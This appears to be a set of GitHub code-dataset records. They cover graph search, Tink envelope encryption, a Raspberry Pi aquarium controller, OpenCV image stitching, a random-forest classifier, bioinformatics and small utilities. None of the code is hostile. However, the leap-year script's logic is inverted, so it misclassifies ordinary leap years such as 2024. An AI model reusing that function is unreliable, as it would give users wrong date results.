None\n","repo_name":"Joshua-Shaffer/FireUAVs","sub_path":"Off-board_ground/Fire_UAV_simulation/FleetAndAgents.py","file_name":"FleetAndAgents.py","file_ext":"py","file_size_in_byte":14668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72169657710","text":"from collections import defaultdict\nfrom heapq import heappop, heappush\n\n\nclass Graph:\n INF = 10**9\n # Searching Algorithms: DFS, BFS\n\n def __init__(self):\n self.graph = defaultdict(list)\n self.count = defaultdict(lambda: 0)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n self.graph[v].append(u)\n\n def BFS(self, numVertex):\n visited = defaultdict(lambda: 0)\n queue = []\n for i in range(1, numVertex+1):\n if visited[i] == 0:\n queue.append(i)\n visited[i] = 1\n while queue:\n u = queue.pop(0)\n print(u, end=' ')\n for v in self.graph[u]:\n if visited[v] == 0:\n queue.append(v)\n visited[v] = 1\n\n def connectedComponentsBFS(self, numVertex):\n visited = defaultdict(lambda: 0)\n stack = []\n path = []\n for i in range(1, numVertex+1):\n if visited[i] == 0:\n stack.append(i)\n visited[i] = 1\n temp = []\n while stack:\n u = stack.pop()\n temp.append(u)\n for v in self.graph[u]:\n if visited[v] == 0:\n stack.append(v)\n visited[v] = 1\n path.append(temp)\n return path\n\n\ndef xytonum(x, y, n, m):\n return (x-1)*m+y\n\n\ndef show(matrix, n, m):\n for i in range(n+2):\n print(*matrix[i])\n\n\nn, m = list(map(int, input().split()))\ng = Graph()\nmatrix = []\nfor i in range(n+2):\n matrix.append([])\n for j in range(m+2):\n matrix[i].append('.')\nfor i in range(n):\n a = input()\n for j in range(m):\n matrix[i+1][j+1] = a[j]\n# show(matrix, n, m)\n\nban = []\nfor i in range(1, n+1):\n for j in range(1, m+1):\n if matrix[i][j] == \"W\":\n now = xytonum(i, j, n, m)\n for k in range(i-1, i+2):\n for l in range(j-1, j+2):\n if matrix[k][l] == \"W\":\n then = xytonum(k, l, n, m)\n g.addEdge(now, then)\n else:\n ban.append(xytonum(i, j, n, m))\n\n\npath = g.connectedComponentsBFS(n*m)\nres = 0\nfor num in path:\n if len(num) > 1:\n res += 1\n elif len(num) == 1:\n if num[0] not in ban:\n res += 1\nprint(res)\n","repo_name":"tranductri2003/Competitive_Programming","sub_path":"ICPC/ICPC Luyện tập 3/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"6572343328","text":"import struct\n\nfrom tink.proto import tink_pb2\nfrom tink import core\nfrom tink.aead import _aead\n\n_SUPPORTED_DEK_KEY_TYPES = frozenset({\n 'type.googleapis.com/google.crypto.tink.AesGcmKey',\n 'type.googleapis.com/google.crypto.tink.XChaCha20Poly1305Key',\n 'type.googleapis.com/google.crypto.tink.AesCtrHmacAeadKey',\n 'type.googleapis.com/google.crypto.tink.AesEaxKey',\n 'type.googleapis.com/google.crypto.tink.AesGcmSivKey',\n})\n\n\ndef is_supported_dek_key_type(type_url: str) -> bool:\n return type_url in _SUPPORTED_DEK_KEY_TYPES\n\n\nclass KmsEnvelopeAead(_aead.Aead):\n \"\"\"Implements envelope encryption.\n\n Envelope encryption generates a data encryption key (DEK) which is used\n to encrypt the payload. The DEK is then send to a KMS to be encrypted and\n the encrypted DEK is attached to the ciphertext. In order to decrypt the\n ciphertext, the DEK first has to be decrypted by the KMS, and then the DEK\n can be used to decrypt the ciphertext. For further information see\n https://cloud.google.com/kms/docs/envelope-encryption.\n\n DEK key template must be a KeyTemplate for any of these Tink AEAD key types\n (any other key template will be rejected):\n * AesGcmKey\n * XChaCha20Poly1305\n * AesCtrHmacAeadKey\n * AesEaxKey\n * AesGcmSivKey\n\n The ciphertext structure is as follows:\n * Length of the encrypted DEK: 4 bytes (big endian)\n * Encrypted DEK: variable length, specified by the previous 4 bytes\n * AEAD payload: variable length\n \"\"\"\n\n # Defines in how many bytes the DEK length will be encoded.\n DEK_LEN_BYTES = 4\n\n def __init__(self, key_template: tink_pb2.KeyTemplate, remote: _aead.Aead):\n if not is_supported_dek_key_type(key_template.type_url):\n raise core.TinkError(\n 'Unsupported DEK key type: %s' % key_template.type_url\n )\n # Create a dek to make sure that it works, so that KmsEnvelopeAead already\n # fails when it is created, and not just when it is used.\n # The C++ implementation does the same check, and we want this\n # implementation to be consistent with the C++ implementation.\n _ = core.Registry.new_key_data(key_template)\n\n self.key_template = key_template\n self.remote_aead = remote\n\n def encrypt(self, plaintext: bytes, associated_data: bytes) -> bytes:\n # Get new key from template\n dek = core.Registry.new_key_data(self.key_template)\n dek_aead = core.Registry.primitive(dek, _aead.Aead)\n\n # Encrypt plaintext\n ciphertext = dek_aead.encrypt(plaintext, associated_data)\n\n # Wrap DEK key values with remote\n encrypted_dek = self.remote_aead.encrypt(dek.value, b'')\n\n # Construct ciphertext, DEK length encoded as big endian\n enc_dek_len = struct.pack('>I', len(encrypted_dek))\n return enc_dek_len + encrypted_dek + ciphertext\n\n def decrypt(self, ciphertext: bytes, associated_data: bytes) -> bytes:\n ct_len = len(ciphertext)\n\n # Recover DEK length\n if ct_len < self.DEK_LEN_BYTES:\n raise core.TinkError\n\n dek_len = struct.unpack('>I', ciphertext[0:self.DEK_LEN_BYTES])[0]\n\n # Basic check if DEK length can be valid.\n if dek_len > (ct_len - self.DEK_LEN_BYTES) or dek_len < 0:\n raise core.TinkError\n\n # Decrypt DEK with remote AEAD\n encrypted_dek_bytes = ciphertext[self.DEK_LEN_BYTES:self.DEK_LEN_BYTES +\n dek_len]\n dek_bytes = self.remote_aead.decrypt(encrypted_dek_bytes, b'')\n\n # Get AEAD primitive based on DEK\n dek = tink_pb2.KeyData(\n type_url=self.key_template.type_url,\n value=dek_bytes,\n key_material_type=tink_pb2.KeyData.SYMMETRIC,\n )\n dek_aead = core.Registry.primitive(dek, _aead.Aead)\n\n # Extract ciphertext payload and decrypt\n ct_bytes = ciphertext[self.DEK_LEN_BYTES + dek_len:]\n\n return dek_aead.decrypt(ct_bytes, associated_data)\n","repo_name":"google/tink","sub_path":"python/tink/aead/_kms_envelope_aead.py","file_name":"_kms_envelope_aead.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":13369,"dataset":"github-code","pt":"38"} +{"seq_id":"13271298909","text":"def is_leap_year(year):\n # Define a dictionary where keys are conditions and values are corresponding actions.\n conditions = {\n \"divisible_by_4\": lambda: year % 4 == 0,\n \"divisible_by_100\": lambda: year % 100 == 0,\n \"divisible_by_400\": lambda: year % 400 == 0,\n }\n\n # Define the logic for leap year determination using the conditions dictionary.\n is_leap = (\n conditions[\"divisible_by_4\"]() and\n (conditions[\"divisible_by_100\"]() or conditions[\"divisible_by_400\"]())\n )\n\n return is_leap\n\n# Input from the user\nyear = int(input(\"Enter a year: \"))\n\n# Check if it's a leap year and print the result\nif is_leap_year(year):\n print(year,\" is a leap year.\")\nelse:\n print(year,\" is not a leap year.\")\n","repo_name":"keyanskv/Keyan_0F5EBEE9279FC9B8013431F38180FCFD","sub_path":"Unit 1 - Challenge/challenge_2.py","file_name":"challenge_2.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17115556386","text":"import RPi.GPIO as GPIO\nimport os\nimport glob\nimport time\nfrom datetime import datetime\nimport mysql.connector # -Enables connection to MYSQL Database\nimport logging # -Enables to write Logfiles\nimport json # -To write/read the data Files\n\n\n# ----Pinsetup (use BOARD pinaout)\nextra_relay = 32\nheater_relay = 36\nmainlight_relay = 38\nco2_relay = 40\n\n# -----mysql-connection infos\nwritetomysql = 180 # default is 180 / all 15 minutes\n\n\n# ---Write-Frequency\n# Default value is 5 Seconds\nsleeptime = 5\n\n# ----Get conntroller Input\ncheckinputfile = 5 # default is 60 / all 5 minutes\n\n\n# ---Functions Start\n# ---Loop counters\nloopcounterinput = checkinputfile\nloopcountermysql = writetomysql\n\n# ---Data Dile Output\nvarread = True\n\n# -----GPIO-Configuration\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(extra_relay, GPIO.OUT) # free relay\nGPIO.setup(heater_relay, GPIO.OUT) # heater\nGPIO.setup(mainlight_relay, GPIO.OUT) # mainlight\nGPIO.setup(co2_relay, GPIO.OUT) # co2\n\n# ---Text colors\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# ---Controller Input JSON Function\n\n\ndef load_controller_input(JSONnode):\n #print(\"Read controller input file\")\n\n inputJSON = open('data/_controller-input.json')\n controllerinput = json.load(inputJSON)\n JSONnode = controllerinput['Controller-input'][JSONnode]\n\n return(str(JSONnode))\n\n\ndef load_controller_mysql(JSONnode):\n #print(\"Read controller input file\")\n\n inputJSON = open('data/_controller-input.json')\n controllerinput = json.load(inputJSON)\n JSONnode = controllerinput['Controller-input']['MYSQL'][JSONnode]\n\n return(str(JSONnode))\n\n# --Write JSON\n\n\ndef writeDataFile(datatime, fulltime, aq_main_light_status, aq_co2_status, aq_heater_status, aq_temp_sen):\n data_RaspberryAQ = {}\n with open(\"data/\" + datatime + \"_data_RaspberryAQ.json\", 'w') as f:\n\n data_RaspberryAQ['data'] = [\n {\n \"timestamp\": fulltime,\n \"aq_mainlight_status\": aq_main_light_status,\n \"aq_co2_status\": aq_co2_status,\n \"aq_heater_status\": aq_heater_status,\n \"aq_temp_sen\": aq_temp_sen\n }\n\n ]\n\n json.dump(data_RaspberryAQ, f, indent=4, sort_keys=True)\n\n\n# -- Delete Old Files\n\ndef DelOldFiles(path):\n\n os.system(\"find \" + path + \" -mtime +30 -print\")\n os.system(\"find \" + path + \" -mtime +30 -delete\")\n\n\n# --Initialize Logging\nlogtime = time.strftime(\"%Y-%m-%d\")\nlogging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S',\n filename=\"log/\" + logtime + \"_Server-RaspberryAQ.log\", level=logging.INFO)\nlogging.info('Server-RaspberryAQ Started!')\nprint(f\"{bcolors.OKGREEN}Server-RaspberryAQ Started!{bcolors.ENDC}\")\ntime.sleep(5)\n\n# --Temp-Function\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\n\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n\ndef read_temp():\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n return temp_c\n\n\n\"\"\"\n# For debug without temp sensor\ndef read_temp():\n temp_c = 25.00\n return temp_c\n\"\"\"\n\n# --Initialize JSON structure\ndata_RaspberryAQ = {}\n# Controller_RaspberryAQ = {}\n\n# --Functions Ende\n\n\n# --Read Input File\ntry:\n aq_main_light_on = load_controller_input(\"aq_main_light_on\")\n aq_main_light_off = load_controller_input(\"aq_main_light_off\")\n aq_co2_on = load_controller_input(\"aq_co2_on\")\n aq_co2_off = load_controller_input(\"aq_co2_off\")\n aq_temp = load_controller_input(\"aq_temp\")\n # Reads the time at wich the inputfile was saved\n lastinputtime = load_controller_input(\"timestamp\")\n\n logging.info('Inputfile imported')\n\n aq_temp = float(aq_temp)\n\n# --Reads the MYSQL Information\n useMYSQL = load_controller_mysql(\"useMYSQL\")\n if(useMYSQL == 'True'):\n host = load_controller_mysql(\"HOST\")\n user = load_controller_mysql(\"USERNAME\")\n passwd = load_controller_mysql(\"PASSWD\")\n database = load_controller_mysql(\"DBNAME\")\n Controller_ID = load_controller_mysql(\"CONTROLLERID\")\n logging.info('MYSQL Infos imported')\n print(f\"{bcolors.OKGREEN}MYSQL Infos imported{bcolors.ENDC}\")\n\n\nexcept:\n print(f\"{bcolors.WARNING}Warning: Inputfile couldn't be found!{bcolors.ENDC}\")\n print(f\"{bcolors.WARNING}Shuting down RasperryAQ-Server!{bcolors.ENDC}\")\n logging.warning(\"Data: Inputfile couldn't be found!\")\n exit()\n\n\nwhile True:\n\n # ---Get Times\n daytime = time.strftime(\"%H:%M\")\n date = time.strftime(\"%d.%m.%Y\")\n datatime = time.strftime(\"%Y-%m-%d\")\n fulltime = time.strftime(\"%d.%m.%Y %H:%M:%S\")\n\n\n# ---Light switching\n\n if(daytime >= aq_main_light_on and daytime <= aq_main_light_off):\n GPIO.output(mainlight_relay, GPIO.LOW)\n aq_main_light_status = \"On\"\n logging.info('Mainlight is switched on')\n else:\n GPIO.output(mainlight_relay, GPIO.HIGH)\n aq_main_light_status = \"Off\"\n logging.info('Mainlight is switched off')\n\n# ---CO2 switching\n\n if(daytime >= aq_co2_on and daytime <= aq_co2_off):\n GPIO.output(co2_relay, GPIO.LOW)\n aq_co2_status = \"On\"\n logging.info('CO2 is switched on')\n\n else:\n GPIO.output(co2_relay, GPIO.HIGH)\n aq_co2_status = \"Off\"\n logging.info('CO2 is switched off')\n\n# ---Temp switching\n\n aq_temp_sen = read_temp()\n\n if(aq_temp_sen <= aq_temp):\n GPIO.output(heater_relay, GPIO.LOW)\n aq_heater_status = \"On\"\n logging.info('Heater is switched on')\n else:\n GPIO.output(heater_relay, GPIO.HIGH)\n aq_heater_status = \"Off\"\n logging.info('Heater is switched off')\n\n\n# ---Output\n# --Terminal output\n print(f\"{bcolors.HEADER}---Controller Values---{bcolors.ENDC}\")\n print(f\"{bcolors.OKBLUE}--Date and Time--{bcolors.ENDC}\")\n print(\"Date and Daytime: \", date, daytime)\n print(\"Fulltime: \", fulltime)\n print(f\"{bcolors.OKBLUE}--Light--{bcolors.ENDC}\")\n print(\"Target time light on\", aq_main_light_on,\n \"and licht off\", aq_main_light_off)\n print(\"Light status: \", aq_main_light_status)\n\n print(f\"{bcolors.OKBLUE}--CO2--{bcolors.ENDC}\")\n print(\"Target time CO2 on\", aq_co2_on, \"and CO2 off\", aq_co2_off)\n print(\"CO2 status: \", aq_co2_status)\n\n print(f\"{bcolors.OKBLUE}--Temprature--{bcolors.ENDC}\")\n print(\"Target temprature:\", aq_temp_sen)\n print(\"Heater status: \", aq_heater_status)\n\n print(f\"{bcolors.OKBLUE}--Other information--{bcolors.ENDC}\")\n\n# --SQL output\n\n if(useMYSQL == 'True' and loopcountermysql >= writetomysql):\n try:\n mydb = mysql.connector.connect( # Opens the MYSQL Connection\n host=host,\n user=user,\n passwd=passwd,\n database=database\n )\n\n mycursor = mydb.cursor()\n\n sql = \"INSERT INTO aq_controller (Controller_ID, aq_timestamp, aq_mainlight, aq_temp, aq_heater, aq_co2_dosing) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (Controller_ID, fulltime, aq_main_light_status,\n aq_temp_sen, aq_heater_status, aq_co2_status)\n mycursor.execute(sql, val)\n mydb.commit()\n\n print(f\"{bcolors.OKGREEN}Values are written to MYSQL Database{bcolors.ENDC}\")\n #print(mycursor.rowcount, \"record inserted.\")\n logging.info(\"MYSQL: Values are written to MYSQL Database\")\n\n mydb.close # Closes the MYSQL Connection\n\n except:\n print(f\"{bcolors.WARNING}MYSQL: Coudn't connect to MYSQL Database{bcolors.ENDC}\")\n logging.warning(\"MYSQL: Coudn't connect to MYSQL Database\")\n pass\n\n loopcountermysql = 0\n\n# --Data File Output\n\n # try to Update JSON\n try:\n if(varread==True):\n dataJSON = open(\"data/\" + datatime + \"_data_RaspberryAQ.json\")\n controllerinput = json.load(dataJSON)\n JSONnode = controllerinput['data']\n\n # print(JSONnode)\n with open(\"data/\" + datatime + \"_data_RaspberryAQ.json\", 'w') as f:\n\n data_RaspberryAQ = {\n\n\n \"timestamp\": fulltime,\n \"aq_mainlight_status\": aq_main_light_status,\n \"aq_co2_status\": aq_co2_status,\n \"aq_heater_status\": aq_heater_status,\n \"aq_temp_sen\": aq_temp_sen\n\n\n }\n #z = json.load(JSONnode)\n JSONnode.append(data_RaspberryAQ)\n\n json.dump(controllerinput, f, indent=4, sort_keys=True)\n\n # create JSON file\n except Exception:\n writeDataFile(datatime, fulltime, aq_main_light_status,\n aq_co2_status, aq_heater_status, aq_temp_sen)\n varread = False\n\n# ---Delete old files\n if(daytime >= \"23:58\" and daytime <= \"23:59\"):\n print(\"There are x Files are Older than 30 Days\")\n directory1 = 'log/*.log'\n directory2 = 'data/*_data_RaspberryAQ.json'\n\n DelOldFiles(directory1)\n DelOldFiles(directory2)\n \n\n# ---Check for new input file\n if(loopcounterinput >= checkinputfile):\n print(\"Check for new Input file\")\n logging.info('Checking for new Input file.')\n try:\n inputtime = load_controller_input(\"timestamp\")\n except:\n print(\n f\"{bcolors.WARNING}Warning: Inputfile couldn't be found!{bcolors.ENDC}\")\n print(f\"{bcolors.WARNING}Running with old config.{bcolors.ENDC}\")\n logging.warning(\"Data: Inputfile couldn't be found!\")\n\n if(datetime.strptime(inputtime, \"%d.%m.%Y %H:%M:%S\") > datetime.strptime(lastinputtime, \"%d.%m.%Y %H:%M:%S\")):\n aq_main_light_on = load_controller_input(\"aq_main_light_on\")\n aq_main_light_off = load_controller_input(\"aq_main_light_off\")\n aq_co2_on = load_controller_input(\"aq_co2_on\")\n aq_co2_off = load_controller_input(\"aq_co2_off\")\n aq_temp = load_controller_input(\"aq_temp\")\n aq_temp = float(aq_temp)\n lastinputtime = load_controller_input(\"timestamp\")\n\n useMYSQL = load_controller_mysql(\"useMYSQL\")\n if(useMYSQL == 'True'):\n host = load_controller_mysql(\"HOST\")\n user = load_controller_mysql(\"USERNAME\")\n passwd = load_controller_mysql(\"PASSWD\")\n database = load_controller_mysql(\"DBNAME\")\n Controller_ID = load_controller_mysql(\"CONTROLLERID\")\n logging.info('MYSQL Infos imported')\n print(f\"{bcolors.OKGREEN}MYSQL Infos imported{bcolors.ENDC}\")\n\n print(f\"{bcolors.OKGREEN}Inputfile updated!{bcolors.ENDC}\")\n logging.info('Inputfile updated!')\n\n loopcounterinput = 0\n\n# ---Loop counters\n loopcounterinput = loopcounterinput + 1\n loopcountermysql = loopcountermysql + 1\n\n# ---Delay\n time.sleep(sleeptime)\n\n# ---Beauty-Command\n os.system('clear') # Disabele for Debug\n","repo_name":"puchtuning/RaspberryAQ-Controller","sub_path":"Server-AQ-controller.py","file_name":"Server-AQ-controller.py","file_ext":"py","file_size_in_byte":11441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"70153617390","text":"import cv2\nimport numpy as np\n\n#获得单应性矩阵\ndef get_homo(img1,img2):\n # pass\n # #先转灰度\n # gray1=cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n # gray2=cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\n #创建SIFT特征检测器\n sift=cv2.xfeatures2d.SIFT_create()\n\n #计算描述子和特征点\n kp1,des1=sift.detectAndCompute(img1,None)\n kp2,des2=sift.detectAndCompute(img2,None)\n #创建特征匹配器\n bf = cv2.BFMatcher(cv2.NORM_L1)\n match = bf.knnMatch(des1, des2,k=2)\n #过滤特征点,找出有效的特征匹配点\n verify_ratio=0.8\n verify_matches=[]\n for m1,m2 in match:\n if m1.distance <0.8*m2.distance:\n verify_matches.append(m1)\n #查找单应性矩阵\n if len(verify_matches)>=4:\n img1_pts=[]\n img2_pts=[]\n for m in verify_matches:\n img1_pts.append(kp1[m.queryIdx].pt)\n img2_pts.append(kp2[m.trainIdx].pt)\n img1_pts=np.float32(img1_pts).reshape(-1,1,2)\n img2_pts = np.float32(img2_pts).reshape(-1, 1, 2)\n H,_=cv2.findHomography(img1_pts,img2_pts,cv2.RANSAC,5.0)\n return H\n else:\n print('err:Not enough matches...')\n exit()\n\n#拼接图片\ndef stitch_image(img1,img2,H):\n #1 获得每张图片的4个角点\n #2 对图片进行变化(用矩阵对图片进行旋转,平移)\n #3 创建大图,拼接两个小图\n #获得原始图的高、宽\n h1,w1=img1.shape[:2]\n h2, w2 = img2.shape[:2]\n #四个角点\n img1_dims=np.float32([[0,0],[0,h1],[w1,h1],[w1,0]]).reshape(-1,1,2)\n img2_dims = np.float32([[0, 0], [0, h2], [w2, h2], [w2, 0]]).reshape(-1, 1, 2)\n #图像变换\n img1_transform = cv2.perspectiveTransform(img1_dims, H)\n # print(img1_dims)\n # print(img2_dims)\n # print(img1_transform)\n #求最大和最小值--为了创大图\n result_dims=np.concatenate((img2_dims,img1_transform),axis=0)\n #print(result_dims)\n [x_min,y_min]=np.int32(result_dims.min(axis=0).ravel()-0.5)\n [x_max, y_max] = np.int32(result_dims.max(axis=0).ravel() + 0.5)\n #平移距离\n transform_dist=[-x_min,-y_min]\n #构建坐标\n transform_array=np.array([[1,0,transform_dist[0]],\n [0,1,transform_dist[1]],\n [0,0,1]])\n\n #透视变化+ transform_array.dot(H)-(实现平移)\n result_img=cv2.warpPerspective(img1,transform_array.dot(H),(x_max-x_min,y_max-y_min))\n #图1,图2拼接\n result_img[transform_dist[1]:transform_dist[1]+h2,transform_dist[0]:transform_dist[0]+w2]=img2\n\n return result_img\n\n\n\n#读图片\nimg1=cv2.imread('1.png') #\nimg2=cv2.imread('2.png') #\n\nimg1=cv2.resize(img1,(480,360))\nimg2=cv2.resize(img2,(480,360))\ninputs=np.hstack((img1,img2))\n\n#单应性矩阵\nH=get_homo(img1,img2)\n\n#拼接图像\nrst_img=stitch_image(img1,img2,H)\n\n#cv2.imshow('hh',inputs)\ncv2.imshow('aa',rst_img)\n\n# #先转灰度\n# gray1=cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n# gray2=cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\n\n# #查找单应性矩阵\n# if len(good)>=4:\n# srcPts=np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1,1,2)\n# dstPts=np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1,1,2)\n# H,_=cv2.findHomography(srcPts,dstPts,cv2.RANSAC,5.0)\n# #透视变化\n# h,w=img1.shape[:2]\n# pts=np.float32([[0,0],[0,h-1],[w-1,h-1],[w-1,0]]).reshape(-1,1,2)\n# dst=cv2.perspectiveTransform(pts,H)\n#\n# cv2.polylines(img2,[np.int32(dst)],True,(0,0,255))\n# else:\n# exit()\n#\n#\n# img3=cv2.drawMatchesKnn(img1,kp1,img2,kp2,[good],None)\n#\n# cv2.imshow('search',img3)\n\nkey=cv2.waitKey(0)\nif(key & 0xFF == ord('q')):\n exit()\ncv2.destroyAllWindows()\n","repo_name":"fivexxxxx/opencv_python","sub_path":"图像拼接/images_stitch.py","file_name":"images_stitch.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24236739430","text":"# Importing few libraries first\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\ndataset = pd.read_csv('/kaggle/input/breast-cancer-wisconsin-benign-or-malignant/tumor.csv')\n\n# Printing first 5 rows\ndataset.head()\n\n# Fetching info about the dataset\ndataset.info()\n\n# Separating the features and labels\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values # The last column has the label value\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\nfeature_scaling = StandardScaler()\nX_train = feature_scaling.fit_transform(X_train)\nX_test = feature_scaling.transform(X_test)\n\nrand_for = RandomForestClassifier(n_estimators = 10, max_depth = 5 ,criterion = 'entropy', random_state = 0)\nrand_for.fit(X_train, y_train)\n\n\n\ny_pred = rand_for.predict(X_test)\n\ncm = confusion_matrix(y_test, y_pred)\nprint(cm)\naccuracy_score(y_test, y_pred)\n\n\n\noutput = pd.DataFrame({'Real_class': y_test, 'Predicted_class': y_pred})\n\n\n\noutput.head()\n\noutput.to_csv('breast_cancer.csv', index=False)\nprint(\"Submission was successfully saved!\")","repo_name":"hitblunders/supervised-learning","sub_path":"breast_cancer.py","file_name":"breast_cancer.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70132314992","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 13:10:29 2018\n\n@author: hecongcong\n\"\"\"\n'''\nThe question 350:Intersection of Two Arrays II\n Given two arrays, write a function to compute their intersection.\n\nExample1:\nInput:nums1 = [1,2,2,1], nums2 = [2,2]\nOutput:[2,2]\n\nExample2:\nInput:nums1 = [4,9,5], nums2 = [9,4,9,8,4]\nOutput:[4,9]\n\nNote:\n1.Each element in the result should appear as many times as it shows in both arrays.\n2.The result can be in any order.\n'''\n\n'''\nThe answer:本题是给定两个数组,找出其交集部分,但是要找出存在于两个数组中全部的元素.\n解题思路:\n给两个数组分别以升序进行排序,产生有序数组order_nums1和order_nums2,然后设置两个指针idx1和idx2,分别表示排序后两个数组的开头位置.\n然后在两个数组内循环,其有三种情况,分别如下:\n1.当order_nums1[idx1]==order_nums2[idx2]时,将元素放入结果中,然后指针分别向前移动一位.\n2.当order_nums1[idx1] ',string)\r\n stuff2 = re.findall('[0-9]+ -> ([^ ]*)',string) #this is useful for data parsing\r\n stuff1 = stuff1[0]\r\n stuff2 = stuff2[0].split(',')\r\n A[stuff1] = stuff2\r\n\r\nkey = str(random.randint(0,len(A)-1))\r\nlst = [key]\r\ndef Cycle(key):\r\n while True:\r\n if A[key] == []:\r\n break\r\n else:\r\n n = random.randint(0,len(A[key])-1)\r\n lst.append(A[key][n])\r\n key1 = key\r\n key = A[key][n]\r\n A[key1].remove(A[key1][n])\r\nCycle(key)\r\n\r\ndef Checker(lst):\r\n for key in lst:\r\n if A[key]!=[]:\r\n return 1\r\n\r\nwhile Checker(lst) == 1: \r\n for key in lst:\r\n if A[key] != []: \r\n lst = lst[:len(lst)-1]\r\n lst1 = lst+lst\r\n lst1 = lst1[lst1.index(key):lst.index(key)+len(lst)]\r\n lst = lst1 + [lst1[0]]\r\n Cycle(key)\r\n break\r\ncont = '->'.join(lst)\r\nprint(cont)","repo_name":"lingminhao/Project-Rosalind","sub_path":"Bioinformatics Textbook Track/Chapter 3/BA3F.py","file_name":"BA3F.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"22706686320","text":"import pymongo\nfrom config import config\n\n\nclass SongModel(object):\n def __init__(self):\n connection = pymongo.MongoClient(\n config['default'].MONGODB_SERVER,\n config['default'].MONGODB_PORT\n )\n db = connection[config['default'].MONGODB_DB]\n self.collection = db[config['default'].MONGODB_COLLECTION]\n\n def get_items(self):\n items = []\n for item in self.collection.find():\n # print(item)\n if(item['name'] != None):\n items.append(item['name'])\n return items\n\n def get_item(self, name):\n item = self.collection.find_one({'name':name})\n if(item):\n return item\n else:\n return ''\n\n def put_item(self, dic):\n self.collection.find_one_and_update({'name':dic['name']},\n {'$set':{'url':dic['url'],\n 'lrc':dic['lrc']}},\n upsert=True)\n # self.collection.find_one_and_update()\n # if(res):\n # self.collection.update()\n # self.collection.insert({'name':dic['name'],'url':dic['url']})\n\n def remove_item(self, name):\n self.collection.remove({'name':name})\n\nif __name__ == '__main__':\n song2 = {'name':'Danielle Delaite-Love Sex Goddess.mp3',\n 'url':'/home/magicyang/Music/Danielle Delaite-Love Sex Goddess.mp3',\n 'lrc':'/home/magicyang/Music/Danielle Delaite-Love Sex Goddess.lrc'}\n sm = SongModel()\n sm.put_item(song2)\n str = sm.get_item(song2['name'])\n song_list = sm.get_items()\n print(song_list)\n # sm.remove_item(song2['name'])\n # song_list = sm.get_items()\n # print(song_list)\n\n","repo_name":"wangduanyang/MusicPlayer","sub_path":"SongModel.py","file_name":"SongModel.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"41441048691","text":"#!/usr/bin/python3\n\nimport argparse\n\n\ndef land_parse(s):\n lands = {}\n # example: a:3 b:10 c:231\n for item in s:\n land, coef = item.split(':')\n lands[land] = int(coef)\n return lands\n\n\ndef wall_coef_parse(s):\n # example: 2,3:4 1,1:53\n wall_dict = {}\n for w in s:\n koord, k = w.split(':')\n i, j = koord.split(',')\n wall_dict[(int(i), int(j))] = int(k)\n return wall_dict\n\n\ndef exit_parse(s):\n ans = []\n for item in s:\n i, j = item.split(',')\n ans.append((int(i), int(j)))\n return ans\n\n\ndef add_args(parser):\n parser.add_argument('-b', '--bombs',\n help='maximum amount of bombs', default=0, type=int)\n\n parser.add_argument('-f', '--inputfile',\n help='labyrinth file name. it contains:'\n 'w - inner walls'\n 'x - outer walls'\n '* - start'\n '. - finish (exit from labyrinth)'\n '\\' \\' - free place\\')')\n\n parser.add_argument('-a', '--alpha',\n help='coefficient to choose characteristic '\n 'of minimal way; '\n 'function=alpha*bombs+(1-alpha)*steps',\n default=0, type=float)\n\n parser.add_argument('-e', '--exits',\n help='cells with exits,format:(i,j); '\n \"it also can be added in labyrinth as '.'\",\n nargs='*', default=[])\n\n parser.add_argument('-s', '--starts',\n help='cells with initial position, '\n 'format: (i,j); '\n \"it also can be added in labyrinth as '*'\",\n nargs='*', 